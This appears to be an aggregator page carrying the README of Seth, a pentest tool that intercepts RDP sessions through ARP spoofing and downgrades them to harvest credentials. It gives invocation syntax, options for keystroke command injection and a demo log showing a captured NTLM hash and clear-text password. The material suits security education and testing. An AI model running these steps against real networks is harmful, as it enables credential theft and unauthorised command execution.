GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects โ†’ SySS-Research โ†’ Seth

SySS-Research / Seth

Licence: mit
Perform a MitM attack and extract clear text credentials from RDP connections

Programming Languages

python
139335 projects - #7 most used programming language

Labels

securitymitmrdpproof-of-concept

Projects that are alternatives of or similar to Seth

Mremoteng
mRemoteNG is the next generation of mRemote, open source, tabbed, multi-protocol, remote connections manager.
Stars: โœญ 5,935 (+447.51%)
Mutual labels:  rdp
Rdesktop
๐Ÿšจ rdesktop is in need of a new maintainter. Please see the home page for more details. ๐Ÿšจ
Stars: โœญ 922 (-14.94%)
Mutual labels:  rdp
Aicdm
AICDL collector services and modules
Stars: โœญ 41 (-96.22%)
Mutual labels:  mitm
Ipban
IPBan Monitors failed logins and bad behavior and bans ip addresses on Windows and Linux. Highly configurable, lean and powerful. Learn more at -->
Stars: โœญ 652 (-39.85%)
Mutual labels:  rdp
Apk Mitm
๐Ÿค– A CLI application that automatically prepares Android APK files for HTTPS inspection
Stars: โœญ 893 (-17.62%)
Mutual labels:  mitm
Bdfproxy
Patch Binaries via MITM: BackdoorFactory + mitmProxy.
Stars: โœญ 857 (-20.94%)
Mutual labels:  mitm
Websploit
Websploit is a high level MITM framework
Stars: โœญ 573 (-47.14%)
Mutual labels:  mitm
Trace
Supply chain transparency platform proof-of-concept based on the Ethereum blockchain โœ๏ธ
Stars: โœญ 52 (-95.2%)
Mutual labels:  proof-of-concept
Physics Command
Physics platform is a tool for hardware systems (e.g: raspberryPi 3B ). It retrieves data passing through the network and sends it to a control panel. It works the same way as a botnet by receiving remote commands. (you can imagine that as a black box)
Stars: โœญ 23 (-97.88%)
Mutual labels:  mitm
Terminals
Terminals is a secure, multi tab terminal services/remote desktop client. It uses Terminal Services ActiveX Client (mstscax.dll). The project started from the need of controlling multiple connections simultaneously. It is a complete replacement for the mstsc.exe (Terminal Services) client. This is official source moved from Codeplex.
Stars: โœญ 971 (-10.42%)
Mutual labels:  rdp
Autordpwn
The Shadow Attack Framework
Stars: โœญ 688 (-36.53%)
Mutual labels:  rdp
Teleport
Teleportๆ˜ฏไธ€ๆฌพ็ฎ€ๅ•ๆ˜“็”จ็š„ๅ กๅž’ๆœบ็ณป็ปŸใ€‚
Stars: โœญ 718 (-33.76%)
Mutual labels:  rdp
Wakxy
Wakxy is a Wakfu packet sniffer (MITM). Written in C++/Qt with Javascript scripting support.
Stars: โœญ 12 (-98.89%)
Mutual labels:  mitm
Injectify
Perform advanced MiTM attacks on websites with ease ๐Ÿ’‰
Stars: โœญ 612 (-43.54%)
Mutual labels:  mitm
Content Aware Resize
Stars: โœญ 41 (-96.22%)
Mutual labels:  proof-of-concept
Awesome Network Stuff
Resources about network security, including: Proxy/GFW/ReverseProxy/Tunnel/VPN/Tor/I2P, and MiTM/PortKnocking/NetworkSniff/NetworkAnalysis/etcใ€‚More than 1700 open source tools for now. Post incoming.
Stars: โœญ 578 (-46.68%)
Mutual labels:  mitm
Cloudconnect
Cloud aware client to connect ssh, sftp and rdp
Stars: โœญ 25 (-97.69%)
Mutual labels:  rdp
Dns Mitm
A minimal DNS service that can provide spoofed replies
Stars: โœญ 54 (-95.02%)
Mutual labels:  mitm
Myrtille
A native HTML4 / HTML5 Remote Desktop Protocol and SSH client
Stars: โœญ 1,007 (-7.1%)
Mutual labels:  rdp
Machine Learning Notebooks
Assorted exercises and proof-of-concepts to understand and study machine learning and statistical learning theory
Stars: โœญ 33 (-96.96%)
Mutual labels:  proof-of-concept
View All Similar Projects โž”

Seth

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage

Run it like this:

$ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]

Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.

The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.

The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:

usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
               [-j INJECT] -c CERTFILE -k KEYFILE
               target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
  target_host           target host of the RDP service
  target_port           TCP port of the target RDP service (default 3389)

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           show debug information
  -f, --fake-server     perform a 'fake server' attack
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        TCP port to listen on (default 3389)
  -b BIND_IP, --bind-ip BIND_IP
                        IP address to bind the fake service to (default all)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        downgrade the authentication protocol to this (default
                        3)
  -j INJECT, --inject INJECT
                        command to execute via key press event injection
  -c CERTFILE, --certfile CERTFILE
                        path to the certificate file
  -k KEYFILE, --keyfile KEYFILE
                        path to the key file

For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.

You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4

Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo

The following ouput shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

Seth

# ./seth.sh eth1 192.168.57.{103,2,102}
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘   by Adrian Vollmer
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘   [email protected]
โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘   SySS GmbH, 2017
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘   https://www.syss.de
โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•   โ•šโ•โ•   โ•šโ•โ•  โ•šโ•โ•
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press:   LShift
Key press:   S
Key release:                 S
Key release:                 LShift
Key press:   E
Key release:                 E
Key press:   C
Key release:                 C
Key press:   R
Key release:                 R
Key press:   E
Key release:                 E
Key press:   T
Key release:                 T
Connection lost
[*] Cleaning up...
[*] Done.

Requirements

  • python3

  • tcpdump

  • arpspoof

    arpspoof is part of dsniff

  • openssl

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].